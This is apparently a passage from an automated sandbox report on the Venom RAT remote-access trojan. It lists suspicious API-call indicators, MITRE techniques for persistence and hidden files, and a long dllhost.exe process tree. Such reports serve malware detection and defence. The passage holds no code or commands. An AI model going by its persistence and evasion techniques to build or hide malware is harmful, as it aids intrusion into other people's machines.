5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1808	Client-built.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
5056	taskmgr.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
3192	Venom RAT + HVNC.exe

Suspicious use of SetWindowsHookEx 49 IoCs

pid	Process
3192	Venom RAT + HVNC.exe
3192	Venom RAT + HVNC.exe
4424	$sxr-powershell.exe
5468	$sxr-powershell.exe
5032	Conhost.exe
6048	$sxr-powershell.exe
3536	$sxr-powershell.exe
3192	Venom RAT + HVNC.exe
3192	Venom RAT + HVNC.exe
7152	$sxr-powershell.exe
3192	Venom RAT + HVNC.exe
3192	Venom RAT + HVNC.exe
3192	Venom RAT + HVNC.exe
6068	$sxr-powershell.exe
3192	Venom RAT + HVNC.exe
2848	$sxr-powershell.exe
3192	Venom RAT + HVNC.exe
6732	$sxr-powershell.exe
1372	$sxr-powershell.exe
3192	Venom RAT + HVNC.exe
7068	$sxr-powershell.exe
6028	$sxr-powershell.exe
3440	Explorer.EXE
4944	$sxr-powershell.exe
3760	Venom RAT + HVNC.exe
3760	Venom RAT + HVNC.exe
3440	Explorer.EXE
3440	Explorer.EXE
4308	$sxr-powershell.exe
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
8104	$sxr-powershell.exe
5228	$sxr-powershell.exe
8804	$sxr-powershell.exe
6016	$sxr-powershell.exe
9124	$sxr-powershell.exe
8924	$sxr-powershell.exe
8432	$sxr-powershell.exe
3760	Venom RAT + HVNC.exe
3760	Venom RAT + HVNC.exe
3760	Venom RAT + HVNC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1584 wrote to memory of 4956	1584	msedge.exe	127
PID 1584 wrote to memory of 4956	1584	msedge.exe	127
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 1684	1584	msedge.exe	128
PID 1584 wrote to memory of 2324	1584	msedge.exe	129
PID 1584 wrote to memory of 2324	1584	msedge.exe	129
PID 1584 wrote to memory of 2804	1584	msedge.exe	130
PID 1584 wrote to memory of 2804	1584	msedge.exe	130
PID 1584 wrote to memory of 2804	1584	msedge.exe	130
PID 1584 wrote to memory of 2804	1584	msedge.exe	130
PID 1584 wrote to memory of 2804	1584	msedge.exe	130
PID 1584 wrote to memory of 2804	1584	msedge.exe	130
PID 1584 wrote to memory of 2804	1584	msedge.exe	130
PID 1584 wrote to memory of 2804	1584	msedge.exe	130
PID 1584 wrote to memory of 2804	1584	msedge.exe	130
PID 1584 wrote to memory of 2804	1584	msedge.exe	130
PID 1584 wrote to memory of 2804	1584	msedge.exe	130
PID 1584 wrote to memory of 2804	1584	msedge.exe	130
PID 1584 wrote to memory of 2804	1584	msedge.exe	130
PID 1584 wrote to memory of 2804	1584	msedge.exe	130
PID 1584 wrote to memory of 2804	1584	msedge.exe	130
PID 1584 wrote to memory of 2804	1584	msedge.exe	130
PID 1584 wrote to memory of 2804	1584	msedge.exe	130
PID 1584 wrote to memory of 2804	1584	msedge.exe	130
PID 1584 wrote to memory of 2804	1584	msedge.exe	130
PID 1584 wrote to memory of 2804	1584	msedge.exe	130

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
6368	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:628
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:388
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{c5d64693-2f0d-488d-9201-957fdf3ccff4}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2752
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{2b294227-f37b-474f-b9df-2c5ddf5e0251}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:180
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{bbe6e257-fe5f-47f6-9964-a913c38b7bc5}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5552
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ccfb4538-8a97-43af-bbcb-e944350942cc}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5752
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5a26010d-8295-44e5-b68c-efe839d11405}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5644
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e0901a64-26ec-4ee3-9fa2-e8dcd4205aa4}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5892
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{4af913f4-1334-4af7-b8ab-4e2c12606efe}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5692
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ba06693d-12be-4960-bb13-625942232bfc}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1968
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{f4310b76-1bd1-4e8c-a222-813df8eb4d84}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3544
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{2b8462f1-7ea8-4e0a-9683-bfebcebb47f5}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2060
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5b5ae6bb-5c17-4a55-bc5f-ff2544f29398}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5296
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{752d7ad7-0d5f-4482-81f3-c57cccc94e65}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5920
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b18d72c3-b609-4ba7-8ef7-426aa47c8094}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5996
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ace7d5af-8686-45ea-8c96-31ebd1cfb713}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:6060
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{48cfb9a3-2c64-4616-b023-3c1e7fcc21f6}
  2⤵
  PID:5228
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9fd0c9c2-cc1d-4e40-8e0e-5824eccbda23}
  2⤵
  PID:6088
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5059ba22-8e44-483f-804c-f2964232a8f8}
  2⤵
  PID:5232
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9d3ebc4a-51f7-4148-9ce2-57e7e4fd7c73}
  2⤵
  PID:4384
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{242bebe7-4de5-437c-9f7d-03bd84bdcf9f}
  2⤵
  PID:828
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{80ca58b4-9c3d-4405-b7bd-6fbc881504eb}
  2⤵
  PID:5472
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a6dfc919-aadf-4175-b671-71fd1fee5049}
  2⤵
  PID:5520
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{d5220710-8bdd-412f-991f-0197154ebdd3}
  2⤵
  PID:5344
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ed6dbadf-ecff-4a73-aea6-4e3b400b42a4}
  2⤵
  PID:5036
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{d39a1c70-bb4b-45fe-8e81-27e53383920f}
  2⤵
  PID:5500
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{0dd6d201-3350-4d85-9cf5-af72dcab1d3b}
  2⤵
  PID:4132
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{867c6137-fa6e-46e7-89ba-57a5179ce6b0}
  2⤵
  PID:4268
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9491aa93-6fbd-4bab-9df0-9261f59d9fd8}
  2⤵
  PID:220
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{fbe1d22e-a03f-46e1-a424-8fcd066d0626}
  2⤵
  PID:5216
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ed7eab24-91b4-4fe7-8fb5-1443c6a695b5}
  2⤵
  PID:6736
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{89bbf131-7c4c-4ebb-90be-711d234dd82e}
  2⤵
  PID:6812
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5b94e1e7-63dc-4e04-901e-b8b988cdd70a}
  2⤵
  PID:6888
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{d40ee592-9072-423a-8e23-700997f7ca48}
  2⤵
  PID:6968
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9d0b5a1c-6e75-4a1d-aee9-6be242392244}
  2⤵
  PID:7132
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{57fdf681-de48-4732-b819-0ea1c86a2b00}
  2⤵
  PID:7100
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a88d0ba4-461e-4c99-b8e6-e82bfb46a471}
  2⤵
  PID:7016
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{1e2a6c65-bdb2-45be-89c4-da37c894591e}
  2⤵
  PID:5352
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{4f5e702e-64d0-40d1-8ea0-9ec905f588c4}
  2⤵
  PID:5696
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{7766c748-d363-4e89-aa3a-ea260febf7e7}
  2⤵
  PID:6616
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{1c47744a-4482-44cc-935b-8fa9a9d95967}
  2⤵
  PID:5276
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{f2ec055a-b81f-4a4f-9341-fc2ebcf57708}
  2⤵
  PID:5308
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8df8615b-48f6-45cf-9e47-42789be29034}
  2⤵
  PID:3856
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{14bea2e9-f23b-446f-9e02-c6703ac73361}
  2⤵
  PID:4320
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b208975b-332d-40c1-91a4-46ba4ab34aa0}
  2⤵
  PID:5364
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b89d421b-65a7-4772-8597-e3ff4c9b403c}
  2⤵
  PID:1468
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{16381f5d-76cc-4851-a408-7c663504240a}
  2⤵
  PID:6104
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{dfe59aaf-b136-4404-8e46-c70f2cff2017}
  2⤵
  PID:6608
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{f76dfa41-e9d0-48fd-9561-fdbc9b4010aa}
  2⤵
  PID:4588
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{591f7b98-5c24-47cf-a2e0-2a854aeee68e}
  2⤵
  PID:4420
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{17a22215-d730-424e-9b58-c90049081872}
  2⤵
  PID:512
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5ca8630f-2f94-439e-850a-430e6a083b0c}
  2⤵
  PID:3040
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{dcb50cae-8d64-4a45-a74a-03b83fedd85e}
  2⤵
  PID:848
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{86ebe9fa-f4a7-427a-b9ed-335a6630995c}
  2⤵
  PID:6288
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{868e6580-e500-47eb-8977-ccb5a4da73d6}
  2⤵
  PID:4420
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{7f72294a-d0c4-42bf-a27b-5b6e0e36bfb1}
  2⤵
  PID:4384
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9de0e11b-4b90-424c-9755-77dfc0c9c37b}
  2⤵
  PID:2616
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{24db793a-44c9-48ef-8116-dedb94e0d4ba}
  2⤵
  PID:992
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{d6fd2119-0a63-43e2-ac1b-c7fd877f93c0}
  2⤵
  PID:868
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{63d9db38-859a-4b47-9122-bd8a08b5dfba}
  2⤵
  PID:5472
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a1f29af7-59be-43d2-b266-b4a700698fc9}
  2⤵
  PID:4792
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8e39581e-340d-491d-860f-60b89d3e6bf9}
  2⤵
  PID:5100
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{4a0074fd-81dc-4fd3-b4c3-f3dbdbb0f31b}
  2⤵
  PID:3744
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a2e2c2d3-b853-40be-b5e5-4b87cb670d2b}
  2⤵
  PID:1680
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{97d2b659-b4c9-404c-bd92-26dea044d9b1}
  2⤵
  PID:4704
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{814fbd27-8e3b-45c2-b30a-7fde85199dc2}
  2⤵
  PID:7056
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{6a149830-1532-49a8-8368-5dbb0b8faa47}
  2⤵
  PID:6844
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{692b5eef-52bd-4113-a6fb-0ce121a1c6da}
  2⤵
  PID:5500
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{f6355d0c-058c-4e4c-84e1-1e70c326e1d2}
  2⤵
  PID:3800
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{11844bf3-eec1-4922-a817-ef2dba125752}
  2⤵
  PID:6492
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{541b93a9-f9aa-43b8-af8b-9c841a3b7ed2}
  2⤵
  PID:6040
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9220dc75-dc94-4fa7-b4d6-3965d47fffde}
  2⤵
  PID:4708
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{4a759d95-fc61-44a0-beec-f33f0203b791}
  2⤵
  PID:5528
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{d8ec3135-c525-4274-be4b-6e692853937a}
  2⤵
  PID:4476
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{7dd90f34-a8a8-4c08-9475-8a9a4a972256}
  2⤵
  PID:2480
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{aadc11a8-eaea-4a6b-a8cb-cd0051da618a}
  2⤵
  PID:3892
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b9536f04-c98a-4f57-9b9e-0ffff4912fd6}
  2⤵
  PID:2236
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{c219f0bb-21b5-4cf5-a2d4-a9fe2c1fc62c}
  2⤵
  PID:6280
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9a8df86b-76e5-41ec-882f-830cda8c06b9}
  2⤵
  PID:5920
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{bbe49ecc-27d0-423d-884a-f8d3f04b0159}
  2⤵
  PID:4000
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{417b5d35-c4e6-4c7e-b4ff-8d28b1fbd799}
  2⤵
  PID:5032
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{2ab612e5-e808-48ab-9b92-c7623fe3141c}
  2⤵
  PID:5388
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{d8d78dc7-bccb-470e-874a-355f549897ee}
  2⤵
  PID:2384
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b61a6092-ed00-4335-ba09-cf4453401757}
  2⤵
  PID:5124
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{067d09d1-a2a4-49bb-adf8-2534ce663224}
  2⤵
  PID:6904
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{37612717-f73c-4335-b757-81bfc72b132b}
  2⤵
  PID:6568
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e5a16a70-ef25-4b0f-b4b4-5e65fc854f1d}
  2⤵
  PID:2480
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{947288d8-9bd5-4d21-9666-f2c1a0b3494d}
  2⤵
  PID:5696
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8d017580-7aa2-40a3-8a0d-14ecc283846f}
  2⤵
  PID:6160
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{012e87df-6b21-47bb-b67e-9cacb95be6de}
  2⤵
  PID:6044
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{178d419f-62dc-44a6-a201-e39a07f2910c}
  2⤵
  PID:6588
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{fdc43c1c-c4e0-4cdd-bf05-25d19bf71812}
  2⤵
  PID:3144
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{bc312e87-3b00-406d-be87-ab480268e774}
  2⤵
  PID:5908
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9b9f0241-6718-4427-8515-c00503fb102c}
  2⤵
  PID:6956
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{d2b28707-c00e-4599-82b2-5f39072d13af}
  2⤵
  PID:3328
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{636a2a2a-4934-40aa-b39a-7b468c1a19c8}
  2⤵
  PID:4316
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{3d0c5724-33e9-4935-8e5e-0881fb624f64}
  2⤵
  PID:5312
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{0c080f20-efbd-4a06-96e0-40750d9c8bbf}
  2⤵
  PID:2616
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e1eb43b1-03f1-47b1-9dd1-c041a0e579c2}
  2⤵
  PID:6904
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a02b3558-ba6d-411a-9b3a-64c4e325c97d}
  2⤵
  PID:3820
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e759479e-b960-4320-b134-04e1eec17638}
  2⤵
  PID:5876
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{36b0ba4a-0d57-4d63-89bb-dee0994c213f}
  2⤵
  PID:5756
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{aa637cbd-800a-4d1b-87ef-2e05074dade1}
  2⤵
  PID:7072
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{99ce7203-1e6a-45b1-b362-4b10820e632b}
  2⤵
  PID:5284
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{af09196b-354d-4dad-a611-c534ef9f2760}
  2⤵
  PID:5620
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{4ad11f54-5ce8-4bb9-a3e0-fb6bc37716f2}
  2⤵
  PID:2288
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{90369a68-d3fb-4bbb-bf10-60cc12f7a6b6}
  2⤵
  PID:5416
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{73c8722a-f24f-4b39-89f3-3075ae954c2a}
  2⤵
  PID:4944
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{37885be1-60e4-4500-aa33-89e087d42096}
  2⤵
  PID:4692
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{2b6d85dc-331e-45cb-a9d5-e08d03f06aec}
  2⤵
  PID:5772
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{0845c0c4-9133-44bb-9885-60adb093def2}
  2⤵
  PID:7116
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e7840d46-2d32-48ad-bd01-296b48a0f143}
  2⤵
  PID:6300
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{db9e23c2-2ff9-44ef-8a7d-43b50e5be448}
  2⤵
  PID:712
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{2743e79f-7e5f-45c5-921f-8786777248b6}
  2⤵
  PID:212
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{df4e6383-36b1-4d5c-b096-c873d4f24fa1}
  2⤵
  PID:5288
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b905f83e-704c-410c-a3ed-52eea0362715}
  2⤵
  PID:1816
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{299ce996-1d70-4e66-bb5a-ac0856321ddb}
  2⤵
  PID:6524
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{54c3725b-d3f2-42fb-92fc-888a0e231c42}
  2⤵
  PID:5664
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{cd3def5a-50f3-4863-8f28-4d91b65e86ee}
  2⤵
  PID:6428
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{dc20210a-b49b-4a65-81eb-3b0f4e23ca7c}
  2⤵
  PID:1284
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{2449c75e-37f0-4bf8-bda7-bf6cbef4919e}
  2⤵
  PID:2480
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{3ae66a74-064f-4f47-ad15-cec2f6af577a}
  2⤵
  PID:5776
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{dba54571-a129-4506-b59b-826f40133845}
  2⤵
  PID:4480
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e6a13960-627e-4d15-b7ff-cdb903e42323}
  2⤵
  PID:4080
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{293a2886-8c42-4bea-b5b4-52849e1e5b74}
  2⤵
  PID:2420
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8fb11479-62af-4bff-aa39-2686df7a568f}
  2⤵
  PID:5172
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5ab3cf93-1ec0-47a9-88f7-067e3c7d12e0}
  2⤵
  PID:3856
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a5f46fed-9315-46d0-a66a-5dcb8d1ad625}
  2⤵
